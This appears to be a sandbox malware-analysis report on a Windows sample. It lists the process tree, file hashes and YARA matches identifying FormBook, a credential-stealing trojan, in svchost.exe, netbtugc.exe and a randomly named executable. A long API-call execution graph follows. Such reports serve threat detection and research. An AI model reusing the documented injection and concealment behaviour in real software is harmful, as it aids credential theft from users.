                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:10:33:22
                                                                        Start date:08/10/2024
                                                                        Path:C:\Users\user\Desktop\fJD7ivEnzm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\fJD7ivEnzm.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'393'415 bytes
                                                                        MD5 hash:46BB75D27887B28474A3EB4570D89CA5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:10:33:23
                                                                        Start date:08/10/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\fJD7ivEnzm.exe"
                                                                        Imagebase:0x4e0000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:10:33:36
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:6
                                                                        Start time:10:33:39
                                                                        Start date:08/10/2024
                                                                        Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                        Imagebase:0x350000
                                                                        File size:22'016 bytes
                                                                        MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:10:33:51
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:10:34:13
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:3.3%
                                                                          Dynamic/Decrypted Code Coverage:1%
                                                                          Signature Coverage:4.2%
                                                                          Total number of Nodes:1893
                                                                          Total number of Limit Nodes:36
                                                                          execution_graph 84283 4010e0 84286 401100 84283->84286 84285 4010f8 84287 401113 84286->84287 84289 401184 84287->84289 84290 40114c 84287->84290 84292 401120 84287->84292 84317 401182 84287->84317 84288 40112c DefWindowProcW 84288->84285 84324 401250 61 API calls __wctomb_s_l 84289->84324 84293 401151 84290->84293 84294 40119d 84290->84294 84292->84288 84331 401000 Shell_NotifyIconW __wctomb_s_l 84292->84331 84298 401219 84293->84298 84299 40115d 84293->84299 84296 4011a3 84294->84296 84297 42afb4 84294->84297 84295 401193 84295->84285 84296->84292 84306 4011b6 KillTimer 84296->84306 84307 4011db SetTimer RegisterWindowMessageW 84296->84307 84326 40f190 10 API calls 84297->84326 84298->84292 84304 401225 84298->84304 84302 401163 84299->84302 84303 42b01d 84299->84303 84308 42afe9 84302->84308 84309 40116c 84302->84309 84303->84288 84330 4370f4 52 API calls 84303->84330 84333 468b0e 74 API calls __wctomb_s_l 84304->84333 84305 42b04f 84332 40e0c0 74 API calls __wctomb_s_l 84305->84332 84325 401000 Shell_NotifyIconW __wctomb_s_l 84306->84325 84307->84295 84314 401204 CreatePopupMenu 84307->84314 84328 40f190 10 API calls 84308->84328 84309->84292 84316 401174 84309->84316 84314->84285 84327 45fd57 65 API calls __wctomb_s_l 84316->84327 84317->84288 84318 42afe4 84318->84295 84319 42b00e 84329 401a50 338 API calls 84319->84329 84320 4011c9 PostQuitMessage 84320->84285 84323 42afdc 84323->84288 84323->84318 84324->84295 84325->84320 84326->84295 84327->84323 84328->84319 84329->84317 84330->84317 84331->84305 84332->84317 84333->84318 84334 40bd20 84336 428194 84334->84336 84339 40bd2d 84334->84339 84335 40bd43 84336->84335 84338 4281bc 84336->84338 84341 4281b2 84336->84341 84356 45e987 86 API calls moneypunct 84338->84356 84343 40bd37 84339->84343 84357 4531b1 85 API calls 5 library calls 84339->84357 84355 40b510 VariantClear 84341->84355 84346 40bd50 84343->84346 84345 4281ba 84347 426cf1 84346->84347 84348 40bd63 84346->84348 84367 44cde9 52 API calls _memmove 84347->84367 84358 40bd80 84348->84358 84351 40bd73 84351->84335 84352 426cfc 84368 40e0a0 84352->84368 84354 426d02 84355->84345 84356->84339 84357->84343 84359 40bd8e 84358->84359 84366 40bdb7 _memmove 84358->84366 84360 40bded 84359->84360 84361 40bdad 84359->84361 84359->84366 84378 4115d7 84360->84378 84372 402f00 84361->84372 84365 4115d7 52 API calls 84365->84366 84366->84351 84367->84352 84369 40e0b2 84368->84369 84370 40e0a8 84368->84370 84369->84354 84412 403c30 52 API calls _memmove 84370->84412 84373 402f10 84372->84373 84374 402f0c 84372->84374 84375 4115d7 52 API calls 84373->84375 84376 4268c3 84373->84376 84374->84366 84377 402f51 moneypunct _memmove 84375->84377 84377->84366 84380 4115e1 _malloc 84378->84380 84381 40bdf6 84380->84381 84384 4115fd std::exception::exception 84380->84384 84389 4135bb 84380->84389 84381->84365 84381->84366 84382 41163b 84404 4180af 46 API calls std::exception::operator= 84382->84404 84384->84382 84403 41130a 51 API calls __cinit 84384->84403 84385 411645 84405 418105 RaiseException 84385->84405 84388 411656 84390 413638 _malloc 84389->84390 84393 4135c9 _malloc 84389->84393 84411 417f77 46 API calls __getptd_noexit 84390->84411 84391 4135d4 84391->84393 84406 418901 46 API calls 2 library calls 84391->84406 84407 418752 46 API calls 8 library calls 84391->84407 84408 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84391->84408 84393->84391 84395 4135f7 RtlAllocateHeap 84393->84395 84398 413624 84393->84398 84401 413622 84393->84401 84395->84393 84396 413630 84395->84396 84396->84380 84409 417f77 46 API calls __getptd_noexit 84398->84409 84410 417f77 46 API calls __getptd_noexit 84401->84410 84403->84382 84404->84385 84405->84388 84406->84391 84407->84391 84409->84401 84410->84396 84411->84396 84412->84369 84413 425ba2 84418 40e360 84413->84418 84415 425bb4 84434 41130a 51 API calls __cinit 84415->84434 84417 425bbe 84419 4115d7 52 API calls 84418->84419 84420 40e3ec GetModuleFileNameW 84419->84420 84435 413a0e 84420->84435 84422 40e421 _wcsncat 84438 413a9e 84422->84438 84425 4115d7 52 API calls 84426 40e45e _wcscpy 84425->84426 84441 40bc70 84426->84441 84430 40e4a9 84430->84415 84431 401c90 52 API calls 84433 40e4a1 _wcscat _wcslen _wcsncpy 84431->84433 84432 4115d7 52 API calls 84432->84433 84433->84430 84433->84431 84433->84432 84434->84417 84460 413801 84435->84460 84490 419efd 84438->84490 84442 4115d7 52 API calls 84441->84442 84443 40bc98 84442->84443 84444 4115d7 52 API calls 84443->84444 84445 40bca6 84444->84445 84446 40e4c0 84445->84446 84502 403350 84446->84502 84448 40e4cb RegOpenKeyExW 84449 427190 RegQueryValueExW 84448->84449 84450 40e4eb 84448->84450 84451 4271b0 84449->84451 84452 42721a RegCloseKey 84449->84452 84450->84433 84453 4115d7 52 API calls 84451->84453 84452->84433 84454 4271cb 84453->84454 84509 43652f 52 API calls 84454->84509 84456 4271d8 RegQueryValueExW 84457 42720e 84456->84457 84458 4271f7 84456->84458 84457->84452 84510 402160 84458->84510 84461 41389e 84460->84461 84468 41381a 84460->84468 84462 4139e8 84461->84462 84464 413a00 84461->84464 84487 417f77 46 API calls __getptd_noexit 84462->84487 84489 417f77 46 API calls __getptd_noexit 84464->84489 84465 4139ed 84488 417f25 10 API calls ___crtsetenv 84465->84488 84467 413967 84467->84422 84468->84461 84472 41388a 84468->84472 84482 419e30 46 API calls ___crtsetenv 84468->84482 84471 41396c 84471->84461 84471->84467 84473 41397a 84471->84473 84472->84461 84477 413909 84472->84477 84483 419e30 46 API calls ___crtsetenv 84472->84483 84486 419e30 46 API calls ___crtsetenv 84473->84486 84474 413945 84474->84461 84474->84467 84479 41395b 84474->84479 84475 413929 84475->84461 84475->84474 84484 419e30 46 API calls ___crtsetenv 84475->84484 84477->84471 84477->84475 84485 419e30 46 API calls ___crtsetenv 84479->84485 84482->84472 84483->84477 84484->84474 84485->84467 84486->84467 84487->84465 84488->84467 84489->84467 84491 419f13 84490->84491 84492 419f0e 84490->84492 84499 417f77 46 API calls __getptd_noexit 84491->84499 84492->84491 84493 419f2b 84492->84493 84498 40e454 84493->84498 84501 417f77 46 API calls __getptd_noexit 84493->84501 84495 419f18 84500 417f25 10 API calls ___crtsetenv 84495->84500 84498->84425 84499->84495 84500->84498 84501->84495 84503 403367 84502->84503 84504 403358 84502->84504 84505 4115d7 52 API calls 84503->84505 84504->84448 84506 403370 84505->84506 84507 4115d7 52 API calls 84506->84507 84508 40339e 84507->84508 84508->84448 84509->84456 84511 426daa 84510->84511 84512 40216b _wcslen 84510->84512 84525 40c600 84511->84525 84515 402180 84512->84515 84516 40219e 84512->84516 84514 426db5 84514->84457 84523 403bd0 52 API calls moneypunct 84515->84523 84524 4013a0 52 API calls 84516->84524 84519 402187 _memmove 84519->84457 84520 4021a5 84521 426db7 84520->84521 84522 4115d7 52 API calls 84520->84522 84522->84519 84523->84519 84524->84520 84526 40c619 84525->84526 84527 40c60a 84525->84527 84526->84514 84527->84526 84530 4026f0 84527->84530 84529 426d7a _memmove 84529->84514 84531 426873 84530->84531 84532 4026ff 84530->84532 84537 4013a0 52 API calls 84531->84537 84532->84529 84534 42687b 84535 4115d7 52 API calls 84534->84535 84536 42689e _memmove 84535->84536 84536->84529 84537->84534 84538 416454 84575 416c70 84538->84575 84540 416460 GetStartupInfoW 84541 416474 84540->84541 84576 419d5a HeapCreate 84541->84576 84543 4164cd 84544 4164d8 84543->84544 84660 41642b 46 API calls 3 library calls 84543->84660 84577 417c20 GetModuleHandleW 84544->84577 84547 4164de 84548 4164e9 __RTC_Initialize 84547->84548 84661 41642b 46 API calls 3 library calls 84547->84661 84596 41aaa1 GetStartupInfoW 84548->84596 84552 416503 GetCommandLineW 84609 41f584 GetEnvironmentStringsW 84552->84609 84556 416513 84615 41f4d6 GetModuleFileNameW 84556->84615 84558 41651d 84559 416528 84558->84559 84663 411924 46 API calls 3 library calls 84558->84663 84619 41f2a4 84559->84619 84562 41652e 84563 416539 84562->84563 84664 411924 46 API calls 3 library calls 84562->84664 84633 411703 84563->84633 84566 416541 84568 41654c __wwincmdln 84566->84568 84665 411924 46 API calls 3 library calls 84566->84665 84637 40d6b0 84568->84637 84571 41657c 84667 411906 46 API calls _doexit 84571->84667 84574 416581 __read 84575->84540 84576->84543 84578 417c34 84577->84578 84579 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84577->84579 84668 4178ff 49 API calls _free 84578->84668 84581 417c87 TlsAlloc 84579->84581 84584 417cd5 TlsSetValue 84581->84584 84585 417d96 84581->84585 84583 417c39 84583->84547 84584->84585 84586 417ce6 __init_pointers 84584->84586 84585->84547 84669 418151 InitializeCriticalSectionAndSpinCount 84586->84669 84588 417d91 84677 4178ff 49 API calls _free 84588->84677 84590 417d2a 84590->84588 84670 416b49 84590->84670 84593 417d76 84676 41793c 46 API calls 4 library calls 84593->84676 84595 417d7e GetCurrentThreadId 84595->84585 84597 416b49 __calloc_crt 46 API calls 84596->84597 84606 41aabf 84597->84606 84598 41ac6a GetStdHandle 84603 41ac34 84598->84603 84599 416b49 __calloc_crt 46 API calls 84599->84606 84600 41acce SetHandleCount 84608 4164f7 84600->84608 84601 41ac7c GetFileType 84601->84603 84602 41abb4 84602->84603 84604 41abe0 GetFileType 84602->84604 84605 41abeb InitializeCriticalSectionAndSpinCount 84602->84605 84603->84598 84603->84600 84603->84601 84607 41aca2 InitializeCriticalSectionAndSpinCount 84603->84607 84604->84602 84604->84605 84605->84602 84605->84608 84606->84599 84606->84602 84606->84603 84606->84608 84607->84603 84607->84608 84608->84552 84662 411924 46 API calls 3 library calls 84608->84662 84610 41f595 84609->84610 84611 41f599 84609->84611 84610->84556 84687 416b04 84611->84687 84613 41f5bb _memmove 84614 41f5c2 FreeEnvironmentStringsW 84613->84614 84614->84556 84616 41f50b _wparse_cmdline 84615->84616 84617 416b04 __malloc_crt 46 API calls 84616->84617 84618 41f54e _wparse_cmdline 84616->84618 84617->84618 84618->84558 84620 41f2bc _wcslen 84619->84620 84624 41f2b4 84619->84624 84621 416b49 __calloc_crt 46 API calls 84620->84621 84626 41f2e0 _wcslen 84621->84626 84622 41f336 84694 413748 84622->84694 84624->84562 84625 416b49 __calloc_crt 46 API calls 84625->84626 84626->84622 84626->84624 84626->84625 84627 41f35c 84626->84627 84630 41f373 84626->84630 84693 41ef12 46 API calls ___crtsetenv 84626->84693 84628 413748 _free 46 API calls 84627->84628 84628->84624 84700 417ed3 84630->84700 84632 41f37f 84632->84562 84634 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84633->84634 84636 411750 __IsNonwritableInCurrentImage 84634->84636 84719 41130a 51 API calls __cinit 84634->84719 84636->84566 84638 42e2f3 84637->84638 84639 40d6cc 84637->84639 84720 408f40 84639->84720 84641 40d707 84724 40ebb0 84641->84724 84644 40d737 84727 411951 84644->84727 84649 40d751 84739 40f4e0 SystemParametersInfoW SystemParametersInfoW 84649->84739 84651 40d75f 84740 40d590 GetCurrentDirectoryW 84651->84740 84653 40d767 SystemParametersInfoW 84654 40d794 84653->84654 84655 40d78d FreeLibrary 84653->84655 84656 408f40 VariantClear 84654->84656 84655->84654 84657 40d79d 84656->84657 84658 408f40 VariantClear 84657->84658 84659 40d7a6 84658->84659 84659->84571 84666 4118da 46 API calls _doexit 84659->84666 84660->84544 84661->84548 84666->84571 84667->84574 84668->84583 84669->84590 84672 416b52 84670->84672 84673 416b8f 84672->84673 84674 416b70 Sleep 84672->84674 84678 41f677 84672->84678 84673->84588 84673->84593 84675 416b85 84674->84675 84675->84672 84675->84673 84676->84595 84677->84585 84679 41f683 84678->84679 84685 41f69e _malloc 84678->84685 84680 41f68f 84679->84680 84679->84685 84686 417f77 46 API calls __getptd_noexit 84680->84686 84682 41f6b1 HeapAlloc 84684 41f6d8 84682->84684 84682->84685 84683 41f694 84683->84672 84684->84672 84685->84682 84685->84684 84686->84683 84690 416b0d 84687->84690 84688 4135bb _malloc 45 API calls 84688->84690 84689 416b43 84689->84613 84690->84688 84690->84689 84691 416b24 Sleep 84690->84691 84692 416b39 84691->84692 84692->84689 84692->84690 84693->84626 84695 41377c __dosmaperr 84694->84695 84696 413753 RtlFreeHeap 84694->84696 84695->84624 84696->84695 84697 413768 84696->84697 84703 417f77 46 API calls __getptd_noexit 84697->84703 84699 41376e GetLastError 84699->84695 84704 417daa 84700->84704 84703->84699 84705 417dc9 __wctomb_s_l __call_reportfault 84704->84705 84706 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84705->84706 84709 417eb5 __call_reportfault 84706->84709 84708 417ed1 GetCurrentProcess TerminateProcess 84708->84632 84710 41a208 84709->84710 84711 41a210 84710->84711 84712 41a212 IsDebuggerPresent 84710->84712 84711->84708 84718 41fe19 84712->84718 84715 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84716 421ff0 __call_reportfault 84715->84716 84717 421ff8 GetCurrentProcess TerminateProcess 84715->84717 84716->84717 84717->84708 84718->84715 84719->84636 84721 408f48 moneypunct 84720->84721 84722 4265c7 VariantClear 84721->84722 84723 408f55 moneypunct 84721->84723 84722->84723 84723->84641 84780 40ebd0 84724->84780 84784 4182cb 84727->84784 84729 41195e 84791 4181f2 LeaveCriticalSection 84729->84791 84731 40d748 84732 4119b0 84731->84732 84733 4119d6 84732->84733 84734 4119bc 84732->84734 84733->84649 84734->84733 84826 417f77 46 API calls __getptd_noexit 84734->84826 84736 4119c6 84827 417f25 10 API calls ___crtsetenv 84736->84827 84738 4119d1 84738->84649 84739->84651 84828 401f20 84740->84828 84742 40d5b6 IsDebuggerPresent 84743 40d5c4 84742->84743 84744 42e1bb MessageBoxA 84742->84744 84745 42e1d4 84743->84745 84746 40d5e3 84743->84746 84744->84745 85001 403a50 52 API calls 3 library calls 84745->85001 84898 40f520 84746->84898 84750 40d5fd GetFullPathNameW 84910 401460 84750->84910 84752 40d63b 84753 40d643 84752->84753 84754 42e231 SetCurrentDirectoryW 84752->84754 84755 40d64c 84753->84755 85002 432fee 6 API calls 84753->85002 84754->84753 84925 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84755->84925 84758 42e252 84758->84755 84760 42e25a GetModuleFileNameW 84758->84760 84762 42e274 84760->84762 84763 42e2cb GetForegroundWindow ShellExecuteW 84760->84763 85003 401b10 84762->85003 84767 40d688 84763->84767 84765 40d669 84933 4091e0 84765->84933 84766 40d656 84766->84765 84999 40e0c0 74 API calls __wctomb_s_l 84766->84999 84771 40d692 SetCurrentDirectoryW 84767->84771 84771->84653 84774 42e28d 85010 40d200 52 API calls 2 library calls 84774->85010 84777 42e299 GetForegroundWindow ShellExecuteW 84778 42e2c6 84777->84778 84778->84767 84779 40ec00 LoadLibraryA GetProcAddress 84779->84644 84781 40d72e 84780->84781 84782 40ebd6 LoadLibraryA 84780->84782 84781->84644 84781->84779 84782->84781 84783 40ebe7 GetProcAddress 84782->84783 84783->84781 84785 4182e0 84784->84785 84786 4182f3 EnterCriticalSection 84784->84786 84792 418209 84785->84792 84786->84729 84788 4182e6 84788->84786 84819 411924 46 API calls 3 library calls 84788->84819 84791->84731 84793 418215 __read 84792->84793 84794 418225 84793->84794 84795 41823d 84793->84795 84820 418901 46 API calls 2 library calls 84794->84820 84798 416b04 __malloc_crt 45 API calls 84795->84798 84801 41824b __read 84795->84801 84797 41822a 84821 418752 46 API calls 8 library calls 84797->84821 84800 418256 84798->84800 84803 41825d 84800->84803 84804 41826c 84800->84804 84801->84788 84802 418231 84822 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84802->84822 84823 417f77 46 API calls __getptd_noexit 84803->84823 84806 4182cb __lock 45 API calls 84804->84806 84808 418273 84806->84808 84810 4182a6 84808->84810 84811 41827b InitializeCriticalSectionAndSpinCount 84808->84811 84813 413748 _free 45 API calls 84810->84813 84812 41828b 84811->84812 84818 418297 84811->84818 84814 413748 _free 45 API calls 84812->84814 84813->84818 84816 418291 84814->84816 84824 417f77 46 API calls __getptd_noexit 84816->84824 84825 4182c2 LeaveCriticalSection _doexit 84818->84825 84820->84797 84821->84802 84823->84801 84824->84818 84825->84801 84826->84736 84827->84738 85011 40e6e0 84828->85011 84832 401f41 GetModuleFileNameW 85029 410100 84832->85029 84834 401f5c 85041 410960 84834->85041 84837 401b10 52 API calls 84838 401f81 84837->84838 85044 401980 84838->85044 84840 401f8e 84841 408f40 VariantClear 84840->84841 84842 401f9d 84841->84842 84843 401b10 52 API calls 84842->84843 84844 401fb4 84843->84844 84845 401980 53 API calls 84844->84845 84846 401fc3 84845->84846 84847 401b10 52 API calls 84846->84847 84848 401fd2 84847->84848 85052 40c2c0 84848->85052 84850 401fe1 84851 40bc70 52 API calls 84850->84851 84852 401ff3 84851->84852 85070 401a10 84852->85070 84854 401ffe 85077 4114ab 84854->85077 84857 428b05 84860 401a10 52 API calls 84857->84860 84858 402017 84859 4114ab __wcsicoll 58 API calls 84858->84859 84862 402022 84859->84862 84861 428b18 84860->84861 84864 401a10 52 API calls 84861->84864 84862->84861 84863 40202d 84862->84863 84865 4114ab __wcsicoll 58 API calls 84863->84865 84866 428b33 84864->84866 84867 402038 84865->84867 84869 428b3b GetModuleFileNameW 84866->84869 84868 402043 84867->84868 84867->84869 84870 4114ab __wcsicoll 58 API calls 84868->84870 84871 401a10 52 API calls 84869->84871 84872 40204e 84870->84872 84873 428b6c 84871->84873 84874 402092 84872->84874 84877 428b90 _wcscpy 84872->84877 84880 401a10 52 API calls 84872->84880 84875 40e0a0 52 API calls 84873->84875 84876 4020a3 84874->84876 84874->84877 84878 428b7a 84875->84878 84879 428bc6 84876->84879 85085 40e830 53 API calls 84876->85085 84885 401a10 52 API calls 84877->84885 84881 401a10 52 API calls 84878->84881 84883 402073 _wcscpy 84880->84883 84884 428b88 84881->84884 84889 401a10 52 API calls 84883->84889 84884->84877 84893 4020d0 84885->84893 84886 4020bb 85086 40cf00 53 API calls 84886->85086 84888 4020c6 84890 408f40 VariantClear 84888->84890 84889->84874 84890->84893 84891 402110 84895 408f40 VariantClear 84891->84895 84893->84891 84896 401a10 52 API calls 84893->84896 85087 40cf00 53 API calls 84893->85087 85088 40e6a0 53 API calls 84893->85088 84897 402120 moneypunct 84895->84897 84896->84893 84897->84742 84899 40f53c 84898->84899 84901 4295c9 __wctomb_s_l 84898->84901 85764 410120 84899->85764 84903 4295d9 GetOpenFileNameW 84901->84903 84902 40f545 85768 4102b0 SHGetMalloc 84902->85768 84903->84899 84904 40d5f5 84903->84904 84904->84750 84904->84752 84906 40f54c 85773 410190 GetFullPathNameW 84906->85773 84908 40f559 85784 40f570 84908->85784 85846 402400 84910->85846 84912 40146f 84915 428c29 _wcscat 84912->84915 85855 401500 84912->85855 84914 40147c 84914->84915 85863 40d440 84914->85863 84917 401489 84917->84915 84918 401491 GetFullPathNameW 84917->84918 84919 402160 52 API calls 84918->84919 84920 4014bb 84919->84920 84921 402160 52 API calls 84920->84921 84922 4014c8 84921->84922 84922->84915 84923 402160 52 API calls 84922->84923 84924 4014ee 84923->84924 84924->84752 84926 428361 84925->84926 84927 4103fc LoadImageW RegisterClassExW 84925->84927 85934 44395e EnumResourceNamesW LoadImageW 84926->85934 85933 410490 7 API calls 84927->85933 84930 40d651 84932 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84930->84932 84931 428368 84932->84766 84934 409202 84933->84934 84935 42d7ad 84933->84935 84990 409216 moneypunct 84934->84990 86071 410940 338 API calls 84934->86071 86074 45e737 90 API calls 3 library calls 84935->86074 84938 409386 84939 40939c 84938->84939 86072 40f190 10 API calls 84938->86072 84939->84767 85000 401000 Shell_NotifyIconW __wctomb_s_l 84939->85000 84941 4095b2 84941->84939 84943 4095bf 84941->84943 84942 409253 PeekMessageW 84942->84990 86073 401a50 338 API calls 84943->86073 84945 42d8cd Sleep 84945->84990 84946 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84946->84939 84947 4095f9 84946->84947 84951 42e158 TranslateMessage DispatchMessageW GetMessageW 84947->84951 84949 42e13b 86092 40d410 VariantClear 84949->86092 84951->84951 84953 42e188 84951->84953 84953->84939 84955 409567 PeekMessageW 84955->84990 84956 44c29d 52 API calls 84991 4094e0 84956->84991 84958 46f3c1 107 API calls 84958->84990 84959 40e0a0 52 API calls 84959->84990 84960 46fdbf 108 API calls 84960->84991 84961 409551 TranslateMessage DispatchMessageW 84961->84955 84963 42dcd2 WaitForSingleObject 84965 42dcf0 GetExitCodeProcess CloseHandle 84963->84965 84963->84990 84964 42dd3d Sleep 84964->84991 86081 40d410 VariantClear 84965->86081 84969 4094cf Sleep 84969->84991 84971 40d410 VariantClear 84971->84990 84973 42d94d timeGetTime 86077 465124 53 API calls 84973->86077 84974 40c620 timeGetTime 84974->84991 84977 465124 53 API calls 84977->84991 84978 42dd89 CloseHandle 84978->84991 84979 47d33e 316 API calls 84979->84990 84981 42de19 GetExitCodeProcess CloseHandle 84981->84991 84982 408f40 VariantClear 84982->84991 84985 42de88 Sleep 84985->84990 84990->84938 84990->84942 84990->84945 84990->84949 84990->84955 84990->84958 84990->84959 84990->84961 84990->84963 84990->84964 84990->84969 84990->84971 84990->84973 84990->84979 84990->84991 84992 42e0cc VariantClear 84990->84992 84993 408f40 VariantClear 84990->84993 84995 45e737 90 API calls 84990->84995 85935 4091b0 84990->85935 85993 40afa0 84990->85993 86019 408fc0 84990->86019 86054 408cc0 84990->86054 86068 4096a0 338 API calls 4 library calls 84990->86068 86069 40d150 TranslateAcceleratorW 84990->86069 86070 40d170 IsDialogMessageW GetClassLongW 84990->86070 86075 465124 53 API calls 84990->86075 86076 40c620 timeGetTime 84990->86076 86091 40e270 VariantClear moneypunct 84990->86091 84991->84956 84991->84960 84991->84974 84991->84977 84991->84978 84991->84981 84991->84982 84991->84985 84991->84990 84994 401b10 52 API calls 84991->84994 84997 401980 53 API calls 84991->84997 86078 45178a 54 API calls 84991->86078 86079 47d33e 338 API calls 84991->86079 86080 453bc6 54 API calls 84991->86080 86082 40d410 VariantClear 84991->86082 86083 443d19 67 API calls _wcslen 84991->86083 86084 4574b4 VariantClear 84991->86084 86085 403cd0 84991->86085 86089 4731e1 VariantClear 84991->86089 86090 4331a2 6 API calls 84991->86090 84992->84990 84993->84990 84994->84991 84995->84990 84997->84991 84999->84765 85000->84767 85001->84752 85002->84758 85004 401b16 _wcslen 85003->85004 85005 4115d7 52 API calls 85004->85005 85008 401b63 85004->85008 85006 401b4b _memmove 85005->85006 85007 4115d7 52 API calls 85006->85007 85007->85008 85009 40d200 52 API calls 2 library calls 85008->85009 85009->84774 85010->84777 85012 40bc70 52 API calls 85011->85012 85013 401f31 85012->85013 85014 402560 85013->85014 85015 40256d __write_nolock 85014->85015 85016 402160 52 API calls 85015->85016 85018 402593 85016->85018 85028 4025bd 85018->85028 85089 401c90 85018->85089 85019 4026f0 52 API calls 